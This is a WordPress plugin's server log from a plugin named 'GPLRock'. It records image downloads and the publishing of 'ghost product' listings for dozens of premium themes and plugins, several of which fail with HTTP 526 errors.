image - Product ID: shortcodes-ultimate-for-amp [04-Apr-2026 07:44:01 UTC] GPLRock: Image downloaded successfully for product camelia-a-floral-studio-florist-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-950ff1cb.jpg [04-Apr-2026 07:44:01 UTC] GPLRock: Using pre-downloaded image for product camelia-a-floral-studio-florist-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-950ff1cb.jpg [04-Apr-2026 07:44:01 UTC] GPLRock: Ghost product published with image - Product ID: camelia-a-floral-studio-florist-wordpress-theme [04-Apr-2026 07:44:03 UTC] GPLRock: Image downloaded successfully for product churchwp-a-contemporary-wordpress-theme-for-churches (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9372f507.jpg [04-Apr-2026 07:44:03 UTC] GPLRock: Using pre-downloaded image for product churchwp-a-contemporary-wordpress-theme-for-churches: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9372f507.jpg [04-Apr-2026 07:44:03 UTC] GPLRock: Ghost product published with image - Product ID: churchwp-a-contemporary-wordpress-theme-for-churches [04-Apr-2026 07:44:05 UTC] GPLRock: Image downloaded successfully for product x-docs-wordpress-product-documentation-creator (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1eb7ea80.png [04-Apr-2026 07:44:05 UTC] GPLRock: Using pre-downloaded image for product x-docs-wordpress-product-documentation-creator: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1eb7ea80.png [04-Apr-2026 07:44:05 UTC] GPLRock: Ghost product published with image - Product ID: x-docs-wordpress-product-documentation-creator [04-Apr-2026 07:44:06 UTC] GPLRock: Image downloaded successfully for product ratings-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4d73b70a.jpg [04-Apr-2026 07:44:06 UTC] GPLRock: Using pre-downloaded image for product ratings-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4d73b70a.jpg [04-Apr-2026 07:44:06 UTC] GPLRock: Ghost product published with image - Product ID: ratings-for-amp [04-Apr-2026 07:44:08 UTC] GPLRock: Image downloaded successfully for product blake-von-hauer-editorial-fashion-magazine-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b9e576bb.jpg [04-Apr-2026 07:44:08 UTC] GPLRock: Using pre-downloaded image for product blake-von-hauer-editorial-fashion-magazine-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b9e576bb.jpg [04-Apr-2026 07:44:08 UTC] GPLRock: Ghost product published with image - Product ID: blake-von-hauer-editorial-fashion-magazine-theme [04-Apr-2026 07:44:10 UTC] GPLRock: Image downloaded successfully for product zuka-clean-minimal-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8613a7d4.jpg [04-Apr-2026 07:44:10 UTC] GPLRock: Using pre-downloaded image for product zuka-clean-minimal-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8613a7d4.jpg [04-Apr-2026 07:44:10 UTC] GPLRock: Ghost product published with image - Product ID: zuka-clean-minimal-woocommerce-theme [04-Apr-2026 07:44:11 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-zapier-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-706ae965.jpg [04-Apr-2026 07:44:11 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-zapier-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-706ae965.jpg [04-Apr-2026 07:44:11 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-zapier-addon [04-Apr-2026 07:44:13 UTC] GPLRock: Image downloaded successfully for product acf-for-amp-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c0e97b9d.png [04-Apr-2026 07:44:13 UTC] GPLRock: Using pre-downloaded image for product acf-for-amp-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c0e97b9d.png [04-Apr-2026 07:44:13 UTC] GPLRock: Ghost product published with image - Product ID: acf-for-amp-addon [04-Apr-2026 07:45:05 UTC] GPLRock: Image download failed for product ultimate-woocommerce-page-templates-builder-wpbakery-page-builder-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:07 UTC] GPLRock: Image download failed for product ultimate-woocommerce-page-templates-builder-wpbakery-page-builder-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-woocommerce-page-templates-builder--wpbakery-page-builder-add-on-3908.webp for product ultimate-woocommerce-page-templates-builder-wpbakery-page-builder-add-on after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:45:09 UTC] GPLRock: Image download failed for product ultimate-woocommerce-page-templates-builder-wpbakery-page-builder-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:11 UTC] GPLRock: Image download failed for product ultimate-woocommerce-page-templates-builder-wpbakery-page-builder-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-woocommerce-page-templates-builder--wpbakery-page-builder-add-on-3908.webp for product ultimate-woocommerce-page-templates-builder-wpbakery-page-builder-add-on after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:45:14 UTC] GPLRock WARNING: Image download failed for product ultimate-woocommerce-page-templates-builder-wpbakery-page-builder-add-on. URL: https://meldwp.com/wp-content/uploads/ultimate-woocommerce-page-templates-builder--wpbakery-page-builder-add-on-3908.webp [04-Apr-2026 07:45:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ultimate-woocommerce-page-templates-builder-wpbakery-page-builder-add-on [04-Apr-2026 07:45:14 UTC] GPLRock: Image download failed for product easygrid-wordpress-creative-gallery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:16 UTC] GPLRock: Image download failed for product easygrid-wordpress-creative-gallery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/easygrid-wordpress-creative-gallery-25806.webp for product easygrid-wordpress-creative-gallery after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:45:18 UTC] GPLRock: Image download failed for product easygrid-wordpress-creative-gallery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:20 UTC] GPLRock: Image download failed for product easygrid-wordpress-creative-gallery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/easygrid-wordpress-creative-gallery-25806.webp for product easygrid-wordpress-creative-gallery after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:45:22 UTC] GPLRock WARNING: Image download failed for product easygrid-wordpress-creative-gallery. URL: https://meldwp.com/wp-content/uploads/easygrid-wordpress-creative-gallery-25806.webp [04-Apr-2026 07:45:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: easygrid-wordpress-creative-gallery [04-Apr-2026 07:45:22 UTC] GPLRock: Image download failed for product alike-wordpress-custom-post-comparison (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:25 UTC] GPLRock: Image download failed for product alike-wordpress-custom-post-comparison (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alike---wordpress-custom-post-comparison-17102.webp for product alike-wordpress-custom-post-comparison after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:45:27 UTC] GPLRock: Image download failed for product alike-wordpress-custom-post-comparison (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:29 UTC] GPLRock: Image download failed for product alike-wordpress-custom-post-comparison (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alike---wordpress-custom-post-comparison-17102.webp for product alike-wordpress-custom-post-comparison after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:45:31 UTC] GPLRock WARNING: Image download failed for product alike-wordpress-custom-post-comparison. URL: https://meldwp.com/wp-content/uploads/alike---wordpress-custom-post-comparison-17102.webp [04-Apr-2026 07:45:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: alike-wordpress-custom-post-comparison [04-Apr-2026 07:45:31 UTC] GPLRock: Image download failed for product coming-soon-products-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:33 UTC] GPLRock: Image download failed for product coming-soon-products-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coming-soon-products-for-woocommerce-31697.webp for product coming-soon-products-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:45:36 UTC] GPLRock: Image download failed for product coming-soon-products-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:38 UTC] GPLRock: Image download failed for product coming-soon-products-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coming-soon-products-for-woocommerce-31697.webp for product coming-soon-products-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:45:40 UTC] GPLRock WARNING: Image download failed for product coming-soon-products-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/coming-soon-products-for-woocommerce-31697.webp [04-Apr-2026 07:45:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: coming-soon-products-for-woocommerce [04-Apr-2026 07:45:40 UTC] GPLRock: Image download failed for product valexa-php-script-for-selling-digital-products-and-digital-downloads (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:42 UTC] GPLRock: Image download failed for product valexa-php-script-for-selling-digital-products-and-digital-downloads (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/valexa-php-script-for-selling-digital-products-and-digital-downloads-17802.webp for product valexa-php-script-for-selling-digital-products-and-digital-downloads after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:45:44 UTC] GPLRock: Image download failed for product valexa-php-script-for-selling-digital-products-and-digital-downloads (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:47 UTC] GPLRock: Image download failed for product valexa-php-script-for-selling-digital-products-and-digital-downloads (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/valexa-php-script-for-selling-digital-products-and-digital-downloads-17802.webp for product valexa-php-script-for-selling-digital-products-and-digital-downloads after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:45:49 UTC] GPLRock WARNING: Image download failed for product valexa-php-script-for-selling-digital-products-and-digital-downloads. URL: https://meldwp.com/wp-content/uploads/valexa-php-script-for-selling-digital-products-and-digital-downloads-17802.webp [04-Apr-2026 07:45:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: valexa-php-script-for-selling-digital-products-and-digital-downloads [04-Apr-2026 07:45:49 UTC] GPLRock: Image download failed for product wp-bra-calculator-woocommerce-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:51 UTC] GPLRock: Image download failed for product wp-bra-calculator-woocommerce-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-bra-calculator---woocommerce-addon-16390.webp for product wp-bra-calculator-woocommerce-addon after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:45:53 UTC] GPLRock: Image download failed for product wp-bra-calculator-woocommerce-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:55 UTC] GPLRock: Image download failed for product wp-bra-calculator-woocommerce-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:45:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-bra-calculator---woocommerce-addon-16390.webp for product wp-bra-calculator-woocommerce-addon after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:45:57 UTC] GPLRock WARNING: Image download failed for product wp-bra-calculator-woocommerce-addon. URL: https://meldwp.com/wp-content/uploads/wp-bra-calculator---woocommerce-addon-16390.webp [04-Apr-2026 07:45:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-bra-calculator-woocommerce-addon [04-Apr-2026 07:45:58 UTC] GPLRock: Image download failed for product post-creator-for-arforms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:46:00 UTC] GPLRock: Image download failed for product post-creator-for-arforms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:46:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/post-creator-for-arforms-22909.webp for product post-creator-for-arforms after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:46:02 UTC] GPLRock: Image download failed for product post-creator-for-arforms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:46:04 UTC] GPLRock: Image download failed for product post-creator-for-arforms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:46:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/post-creator-for-arforms-22909.webp for product post-creator-for-arforms after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:46:06 UTC] GPLRock WARNING: Image download failed for product post-creator-for-arforms. URL: https://meldwp.com/wp-content/uploads/post-creator-for-arforms-22909.webp [04-Apr-2026 07:46:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: post-creator-for-arforms [04-Apr-2026 07:46:06 UTC] GPLRock: Image download failed for product gutenberg-clipboard-clipboard-for-block-editor-blocks (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:46:09 UTC] GPLRock: Image download failed for product gutenberg-clipboard-clipboard-for-block-editor-blocks (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:46:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gutenberg-clipboard---clipboard-for-block-editor-blocks-25296.webp for product gutenberg-clipboard-clipboard-for-block-editor-blocks after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:46:11 UTC] GPLRock: Image download failed for product gutenberg-clipboard-clipboard-for-block-editor-blocks (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:46:13 UTC] GPLRock: Image download failed for product gutenberg-clipboard-clipboard-for-block-editor-blocks (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:46:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gutenberg-clipboard---clipboard-for-block-editor-blocks-25296.webp for product gutenberg-clipboard-clipboard-for-block-editor-blocks after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:46:15 UTC] GPLRock WARNING: Image download failed for product gutenberg-clipboard-clipboard-for-block-editor-blocks. URL: https://meldwp.com/wp-content/uploads/gutenberg-clipboard---clipboard-for-block-editor-blocks-25296.webp [04-Apr-2026 07:46:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gutenberg-clipboard-clipboard-for-block-editor-blocks [04-Apr-2026 07:46:15 UTC] GPLRock: Image download failed for product whatsapp-chat-support-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:46:17 UTC] GPLRock: Image download failed for product whatsapp-chat-support-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:46:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/whatsapp-chat-support---wordpress-plugin-17014.webp for product whatsapp-chat-support-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:46:19 UTC] GPLRock: Image download failed for product whatsapp-chat-support-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:46:22 UTC] GPLRock: Image download failed for product whatsapp-chat-support-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:46:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/whatsapp-chat-support---wordpress-plugin-17014.webp for product whatsapp-chat-support-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:46:24 UTC] GPLRock WARNING: Image download failed for product whatsapp-chat-support-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/whatsapp-chat-support---wordpress-plugin-17014.webp [04-Apr-2026 07:46:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: whatsapp-chat-support-wordpress-plugin [04-Apr-2026 07:46:24 UTC] GPLRock: Image download failed for product social-media-banner-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:46:26 UTC] GPLRock: Image download failed for product social-media-banner-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:46:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-media-banner-plugin-26486.webp for product social-media-banner-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:46:28 UTC] GPLRock: Image download failed for product social-media-banner-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:46:30 UTC] GPLRock: Image download failed for product social-media-banner-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:46:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-media-banner-plugin-26486.webp for product social-media-banner-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:46:32 UTC] GPLRock WARNING: Image download failed for product social-media-banner-plugin. URL: https://meldwp.com/wp-content/uploads/social-media-banner-plugin-26486.webp [04-Apr-2026 07:46:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: social-media-banner-plugin [04-Apr-2026 07:46:47 UTC] GPLRock: Image downloaded successfully for product geodirectory-marker-cluster (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7273d9eb.jpg [04-Apr-2026 07:46:47 UTC] GPLRock: Using pre-downloaded image for product geodirectory-marker-cluster: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7273d9eb.jpg [04-Apr-2026 07:46:47 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-marker-cluster [04-Apr-2026 07:46:48 UTC] GPLRock: Image downloaded successfully for product facetwp-color (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4cc93516.jpg [04-Apr-2026 07:46:48 UTC] GPLRock: Using pre-downloaded image for product facetwp-color: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4cc93516.jpg [04-Apr-2026 07:46:48 UTC] GPLRock: Ghost product published with image - Product ID: facetwp-color [04-Apr-2026 07:46:50 UTC] GPLRock: Image downloaded successfully for product mythemeshop-school-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-67b6d5ad.jpg [04-Apr-2026 07:46:50 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-school-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-67b6d5ad.jpg [04-Apr-2026 07:46:50 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-school-wordpress-theme [04-Apr-2026 07:46:51 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-color-and-label-variations-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-963d3124.jpg [04-Apr-2026 07:46:51 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-color-and-label-variations-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-963d3124.jpg [04-Apr-2026 07:46:51 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-color-and-label-variations-premium [04-Apr-2026 07:46:53 UTC] GPLRock: Image downloaded successfully for product formidable-forms-api-webhooks (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e1b4915.jpg [04-Apr-2026 07:46:53 UTC] GPLRock: Using pre-downloaded image for product formidable-forms-api-webhooks: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e1b4915.jpg [04-Apr-2026 07:46:53 UTC] GPLRock: Ghost product published with image - Product ID: formidable-forms-api-webhooks [04-Apr-2026 07:46:55 UTC] GPLRock: Image downloaded successfully for product sterling-responsive-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c1a9d1b6.jpg [04-Apr-2026 07:46:55 UTC] GPLRock: Using pre-downloaded image for product sterling-responsive-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c1a9d1b6.jpg [04-Apr-2026 07:46:55 UTC] GPLRock: Ghost product published with image - Product ID: sterling-responsive-wordpress-theme [04-Apr-2026 07:46:56 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-upload-file (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2762b466.jpg [04-Apr-2026 07:46:56 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-upload-file: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2762b466.jpg [04-Apr-2026 07:46:56 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-upload-file [04-Apr-2026 07:46:58 UTC] GPLRock: Image downloaded successfully for product mythemeshop-cleanapp-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a55c2543.jpg [04-Apr-2026 07:46:58 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-cleanapp-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a55c2543.jpg [04-Apr-2026 07:46:58 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-cleanapp-wordpress-theme [04-Apr-2026 07:47:00 UTC] GPLRock: Image downloaded successfully for product ninja-forms-constant-contact (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-51ec1161.jpg [04-Apr-2026 07:47:00 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-constant-contact: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-51ec1161.jpg [04-Apr-2026 07:47:00 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-constant-contact [04-Apr-2026 07:47:02 UTC] GPLRock: Image downloaded successfully for product infinite-responsive-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e9ccdf7.jpg [04-Apr-2026 07:47:02 UTC] GPLRock: Using pre-downloaded image for product infinite-responsive-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e9ccdf7.jpg [04-Apr-2026 07:47:02 UTC] GPLRock: Ghost product published with image - Product ID: infinite-responsive-multi-purpose-wordpress-theme [04-Apr-2026 07:48:55 UTC] GPLRock: Image downloaded successfully for product parkivia-auto-parking-car-maintenance-wp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c6f33320.png [04-Apr-2026 07:48:55 UTC] GPLRock: Using pre-downloaded image for product parkivia-auto-parking-car-maintenance-wp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c6f33320.png [04-Apr-2026 07:48:55 UTC] GPLRock: Ghost product published with image - Product ID: parkivia-auto-parking-car-maintenance-wp [04-Apr-2026 07:48:57 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-widgets-pack-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-676dd579.jpg [04-Apr-2026 07:48:57 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-widgets-pack-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-676dd579.jpg [04-Apr-2026 07:48:57 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-widgets-pack-addon [04-Apr-2026 07:48:58 UTC] GPLRock: Image downloaded successfully for product zephys-architecture-interior-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-25be047e.jpg [04-Apr-2026 07:48:58 UTC] GPLRock: Using pre-downloaded image for product zephys-architecture-interior-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-25be047e.jpg [04-Apr-2026 07:48:58 UTC] GPLRock: Ghost product published with image - Product ID: zephys-architecture-interior-wordpress-theme [04-Apr-2026 07:49:00 UTC] GPLRock: Image downloaded successfully for product grotte-a-dedicated-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-53f9c382.jpg [04-Apr-2026 07:49:00 UTC] GPLRock: Using pre-downloaded image for product grotte-a-dedicated-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-53f9c382.jpg [04-Apr-2026 07:49:00 UTC] GPLRock: Ghost product published with image - Product ID: grotte-a-dedicated-woocommerce-theme [04-Apr-2026 07:49:01 UTC] GPLRock: Image downloaded successfully for product andaman-creative-business-wordpress-theme-2 (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4ebebfa6.jpg [04-Apr-2026 07:49:01 UTC] GPLRock: Using pre-downloaded image for product andaman-creative-business-wordpress-theme-2: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4ebebfa6.jpg [04-Apr-2026 07:49:01 UTC] GPLRock: Ghost product published with image - Product ID: andaman-creative-business-wordpress-theme-2 [04-Apr-2026 07:49:04 UTC] GPLRock: Image downloaded successfully for product quform-responsive-ajax-contact-form (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b8099057.jpg [04-Apr-2026 07:49:04 UTC] GPLRock: Using pre-downloaded image for product quform-responsive-ajax-contact-form: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b8099057.jpg [04-Apr-2026 07:49:04 UTC] GPLRock: Ghost product published with image - Product ID: quform-responsive-ajax-contact-form [04-Apr-2026 07:49:05 UTC] GPLRock: Image downloaded successfully for product autima-car-accessories-theme-for-woocommerce-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-774e542f.jpg [04-Apr-2026 07:49:06 UTC] GPLRock: Using pre-downloaded image for product autima-car-accessories-theme-for-woocommerce-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-774e542f.jpg [04-Apr-2026 07:49:06 UTC] GPLRock: Ghost product published with image - Product ID: autima-car-accessories-theme-for-woocommerce-wordpress [04-Apr-2026 07:49:07 UTC] GPLRock: Image downloaded successfully for product amory-blog-a-responsive-wordpress-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-10a4121d.jpg [04-Apr-2026 07:49:07 UTC] GPLRock: Using pre-downloaded image for product amory-blog-a-responsive-wordpress-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-10a4121d.jpg [04-Apr-2026 07:49:07 UTC] GPLRock: Ghost product published with image - Product ID: amory-blog-a-responsive-wordpress-blog-theme [04-Apr-2026 07:49:09 UTC] GPLRock: Image downloaded successfully for product anotte-horizontal-photography-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9c55ee6e.jpg [04-Apr-2026 07:49:09 UTC] GPLRock: Using pre-downloaded image for product anotte-horizontal-photography-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9c55ee6e.jpg [04-Apr-2026 07:49:09 UTC] GPLRock: Ghost product published with image - Product ID: anotte-horizontal-photography-wordpress-theme 